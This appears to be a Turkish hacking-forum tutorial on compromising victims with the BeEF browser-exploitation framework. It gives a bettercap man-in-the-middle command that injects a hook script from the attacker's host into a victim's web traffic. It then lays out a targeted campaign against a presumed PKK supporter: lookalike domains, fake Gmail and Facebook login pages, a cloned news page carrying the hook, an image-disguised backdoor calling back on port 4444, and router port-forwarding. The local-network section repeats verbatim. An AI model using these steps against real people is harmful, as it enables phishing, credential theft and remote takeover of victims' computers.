bugün sizlere beef framework ile nasıl hem yerel ağ , hemde dış ağı hackleyebileceğinizi göstereceğim. normalde bu 2 konu olması gerek ama ben tek konuda sizler için birleştiriyorum. dış ağ videosu tam 40 dakika sürdü.bu konuya yerel ve dış ağ olmak üzere 2 tane video ekliyorum
ilk önce yerel ağımızdan bir kurban seçiyoruz
yerel ağımızdaki bütün ip adreslerini görmek için terminale :
nmap 192.168.1.0/24
kurbanımızın ip adresini öğrendikden sonra mitm saldırı yapmak için bettercap
programını kuruyoruz.
bettercap kurulum:
apt-get install bettercap
şimdi bettercap ile mitm saldırı yaparak kurbanın her girdiği http protokollü web sitelerine beef’in java script kodunu enjekte edeceğiz ve böylece beef panelinde kurbanımız online olacaktır.
bettercap ile mitm saldırı yapmak için terminale :
bettercap -T Kurbanın_İp_Adresi --proxy-module injectjs --js-url "http://kendi_İp_Adresiniz:3000/hook.js"
ilk önce yerel ağımızdan bir kurban seçiyoruz
yerel ağımızdaki bütün ip adreslerini görmek için terminale :
nmap 192.168.1.0/24
kurbanımızın ip adresini öğrendikden sonra mitm saldırı yapmak için bettercap
programını kuruyoruz.
bettercap kurulum:
apt-get install bettercap
şimdi bettercap ile mitm saldırı yaparak kurbanın her girdiği http protokollü web sitelerine beef’in java script kodunu enjekte edeceğiz ve böylece beef panelinde kurbanımız online olacaktır.
bettercap ile mitm saldırı yapmak için terminale :
bettercap -T Kurbanın_İp_Adresi --proxy-module injectjs --js-url "http://kendi_İp_Adresiniz:3000/hook.js"
beef ile dış ağı hacklemek için gerekli malzemeler !!
İlk Başta Kendimize Bir Kurban Belirliyoruz. Kurbanımıza Göre Hazırlık Yapıyoruz. Video Da Canlandırma Olarak Pkk Bir Kurban Seçtim Ve Hazırlıklarımı Ona Göre Yapmayı Gösterdim...
Kurbanımızın Pkk Destekçisi Olduğunu Farz Ediyoruz Ve Çalışmalarımızı Ona Göre Ayarlıyoruz
1=Pkk Ya Yakın İsimlerde Bir Tane Duckdns Adresi Aç
Biz Kurbanımıza Bir Link Yolladığımız Zaman Bunun Pkk ’ya Yakın Bir İsim De Olması Lazım Ki , Kurbanımızın İlgisini Çeksin Ve Bizim Sitemize Girsin
Benim Video Da Açtığım Duckdns Adresimin Adı = Hewall.duckdns.org
Biz Bu Adresi Web Site Adresimiz Olarak Kullanacağız...eğerki Duckdns Hesabı Açmasını Ve Kali Linux’a Duckdns Kurulumu Bilmiyorsanız Konulara Bakarak , Duckdns Adresi Açabilir Ve Kali Linux’a Duckdns Kurabilirsiniz.
2=Google-Facebook-Twitter-İnstagram Phishing İçin 2.duckdns Adresini Aç.eğerki Gmail Phishing Yapacaksan Google’a Yakın,
Eğer Facebook Phishing Yapacaksan Facebook’a Yakın Bir İsim De Duckdns Adresi Aç
Burada Anlatmak İstediğim , Beef İle Yaptığımız Phishing Saldırıları Biraz Zayıf Kalıyor.bu Yüzden Beef’in Özelleriklerinden Hariç Kendi Fake Scriptimiz İle Kurbanı Hackleyebiliriz. Fakat Videodaki Site Adım Hewall.duckdns.org Olduğu İçin , Kurbanı Phishing Sayfasına Yönlendirdiğimde Taayıcaki Url Adresinin Hewall.duckdns.org Olarak Görünmesini İstemediğimden Ve Daha İnandırıcı Olması Bakımından ,
Google-Account.duckdns.org Adresini Açtım. Böylece Kurbanı Gmail Phishing Sayfasına Yönlendirdiğimde , Tarayıcıda Hewall.duckdns.org Yerine
Google-Account.duckdns.org Görünecektir Ve İnandırıcılığımız Daha Yüksek Olacaktır. Fakat İsterseniz Açmayadabilirsiniz. Sadece 1 Tane Duckdns Adresi İle De Bu İşi Yapabilirsiniz.
3=Phishing İçin Açtığın Duckdns Adresine Göre Fake Script Bul Ve Local Hostuna At
Burada Anlatmak İstediğim.eğerki Facebook Phishing İçin Duckdns Adresi Açtıysanız , Bir Tane Facebook Fake Script Bulun Ve Local Hostunuza Atın.
Eğerki Benim Gibi Gmail İçin Bir Duckdns Adresi Açtıysanız, Gmail Fake Script Bulun Ve Local Hostunuza Atın...
4=Pkk İle Ve Pkk Yı Öven ,uzun Bir Makale Olan Haber Bul Ve Sitenin Kodlarını Kopyala
Burada Anlatılmak İstenilen Şey , Biz Bir İndex.html Hazırlamamız Lazım Ki , Kurban Bizim Local Hostumuza Girdiğinde Bir Web Sitesini Okuyor Gibi Zannetmeli. Herhangibi Bir Pkk Yandaşı Sitelere Giriyoruz Ve Pkk Yı Öven Bir Haber Buluyoruz. Sayfada Sağ Tıklıyoruz Ve Sayfa Kaynağını Görüntüle Diyoruz.önümüze Çıkan Sayfayı Ctrl+A İle Bütün Kodları Seçiyoruz Ve Ctrl+C İle Kopyalıyoruz. Daha Sonra Leafpad İle Boş Bir Metin Belgesi Açıyoruz Kodları İçine Yapıştırıyoruz.daha Sonra En Aşağıya İniyoruz Ve Yazan Yerin Bir Üstüne Beef Java Script Kodunu Yazıyoruz Yazıyoruz.
Sizde Js Kodunun İçinde 127.0.0.1 Yazar . Orayı Siliyoruz Ve Duckdns Adresimizi Yazıyoruz.daha Sonra Kaydet Butonuna Tıklıyoruz Ve Local Hostumuza İndex.html Olarak Kayıt Ediyoruz.
5=Bir Backdoor Hazırla Ve Hazırladığın Backdoor’u Pkk’lı Bir Resim İle Birleştir Local Hostuna At
Şimdi Olur Da Kurbana Backdoor Yedirebilirsiniz.bunun İçin Önceden Herşey Hazırlanmış Bir Vaziyette Elimizin Altında Olmalıdır. Daha Önce Açtığım Konular Arasında Fud Backdoor Hazırlama Vardır. Ayriyeten Bir Backdooru Resim İle Birleştirmek İçin Yine Konularım Arasında Olan Metasploit İle Yapılan Trojanları Resim İle Birleştirme Adlı Video’yu İzkeyerek Bu İşi Yapabilirsiniz...
Kali Linux Da Tam Fud Backdoor Oluşturmak İçin yine açtığım konulara bakabilirsiniz
Backdoor’u Hazırlarken İp Adresi Yerine Duckdns Adresinizi Yazın.port Kısmına Da 4444 Yazın.bu İş İçin İsterseniz Ayrı Bir Duckdns Adresi Açmanıza Gerek Yoktur. Ben Video ’daki Backdoor’u Yaklaşık 2 Ay Önce Hazırlayıp Arşivime Koyduğum İçin Farklı Bir Duckdns Adresi İle Kullanmak Zorunda Kaldım...daha Sonra Backdorunuzu Pkk’lı Bir Resim İle Birleştirin. Böylece Kurbanın Bilgisayarına İndiğinde Dışardan Bir Pkk’lı Resmi Olduğu Görünsün. Daha Sonra Bu Backdoor’u Local Hostunuza Atın.
7=Beef Ayarlarını Yap
Bu Kısmın Tamamını Video Dan İzleyerek Yapın. Burada Anlatsam Da Birşey Anlamanız Mümkün Değil.
8= Modemden Gerekli Portları Aç
80 Tcp-Udp >>Gerekli
53 Tcp-Udp >> Gereksiz ( Beef De Bir Kaçtane Tool Var Ve 53. Port’un Açık Olması Lazım Bu Toolları Kullanmak İçin . Fakat Hiç İşe Yaramayn Toollar
İseyen Açmasn...
3000 Tcp-Udp >> Gerekli
5432 Tcp-Udp >> Gereksiz (Eğerki Local Hostunuzda Bir Mysql Server Yok İse Bu Portu Açmanıza Gerek Yoktur)
55552 Tcp-Udp >> Gereksiz (Bunu Da Açmanıza Gerek Yoktur. Metasploit İle Birlikte Herhangibi Bir İş Yapmıyoruz.)
4444 Tcp-Udp >> Gerekli (Bu Local Hostumuza Attığımız Backdooru Kullanmak İçin Gereken Port.eğerki Siz Backdoor Oluştururken Port Kısmına 4444 Yazmadıysanız Ve Başka Bir Port Numarasını Açtıysanız , Ozaman Yazdığınız Port Numarasını Giriniz...
